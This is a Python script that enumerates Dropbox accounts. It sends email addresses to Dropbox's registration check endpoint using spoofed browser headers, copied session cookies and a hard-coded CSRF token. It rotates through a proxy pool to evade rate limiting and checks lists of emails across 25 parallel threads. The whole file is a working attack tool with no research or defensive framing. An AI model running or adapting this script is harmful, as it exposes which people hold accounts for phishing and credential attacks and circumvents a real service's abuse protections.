import requests
import random
from concurrent.futures import ThreadPoolExecutor, as_completed
from termcolor import colored
from proxy_pool import get_random_proxy,verify_proxy

def gen_csrf_token():
    return "Ti-76cYVFUgl6JZWCngs_zW5"


def check_email_exists(email, retries=3):
    url = "https://www.dropbox.com/2/account/check_user_with_email_exists"
    data = {
        "email": email
    }

    headers = {
        'Accept': '*/*',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'keep-alive',
        'Content-Type': 'application/json',
        'Origin': 'https://www.dropbox.com',
        'Referer': 'https://www.dropbox.com/register',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6',
        'X-CSRF-Token': gen_csrf_token(),
        'X-Dropbox-Uid': '-1',
    }

    cookies = {
        'locale': 'en',
        't': 'Ti-76cYVFUgl6JZWCngs_zW5',
        '__Secure-dbx_consent': '{"consentType":1,"consentDate":"2024-12-22T19:02:27.734Z","expireDate":"2025-06-22T18:02:27.734Z","consentMonths":6,"categories":{"strictly necessary":true,"general marketing and advertising":false,"analytics":false,"performance and functionality":false,"social media advertising":false},"userInteracted":true,"numDots":1}',
        '__Secure-dbx_do_not_sell': '{"optInToDNS":true,"expireDate":"2025-12-22T19:02:27.707Z"}',
        '_cs_id': '56f545b4-83ba-a8fb-f696-e204a13a7c18.1734893634.1.1734894146.1734893634.1724166274.1769057634650.1',
        'AMCV_B2AAF3C959275C660A495E7B%40AdobeOrg': '179643557|MCIDTS|20080|MCMID|90343634936081877749122321668425384820|MCOPTOUT-1734901345s|NONE|vVersion|5.5.0',
        'AMCVS_B2AAF3C959275C660A495E7B%40AdobeOrg': '1',
        '_cs_c': '0',
        'dbx_js_analytics_id': 'AACUoE5XROzotggnHCD5vd6CjfhmgYV6Z_w_ylpyWSDmxA',
        '__Host-logged-out-session': 'ChByyKR2YA2kXu%2FNd9QiHGF5EL%2FAobsGGi5BTHlZM1NZalNVcmR3NTgtQ2xLUHNBM0x4b3RjUVVNdThfVHlFRzJIb1l6ODF3',
        '__Host-js_csrf': 'Ti-76cYVFUgl6JZWCngs_zW5',
        '__Host-ss': 'fmJ0DybIjI',
        'gvc': 'NTM4OTQ3MTc5MTc1MTE3Njk3ODg3OTg3MTU2NjE0NDYyODU0OTc=',
    }

    attempt = 0
    while attempt < retries:
        try:
            proxy = get_random_proxy()
            if proxy is None:
                return

            # Try different proxies until one works
            for _ in range(retries):
                if verify_proxy(proxy):
                    # Attempt to make the request
                    response = requests.post(url, headers=headers, cookies=cookies, json=data, proxies=proxy, timeout=10)

                    if response.status_code == 200:
                        response_data = response.json()
                        if response_data.get("exists") == True:
                            print(colored(f"Email {email} is valid and exists on Dropbox.", "green"))
                        else:
                            print(colored(f"Email {email} is not valid and does not exist on Dropbox.", "red"))
                        return
                # Get a new proxy for retry if the current one fails
                proxy = get_random_proxy()  # Get a new proxy for retry

            # If we exhausted the retries and didn't succeed, report failure
            return

        except requests.exceptions.RequestException:
            attempt += 1


def check_multiple_emails(emails):
    with ThreadPoolExecutor(max_workers=25) as executor:
        futures = [executor.submit(check_email_exists, email) for email in emails]
        for future in as_completed(futures):
            future.result()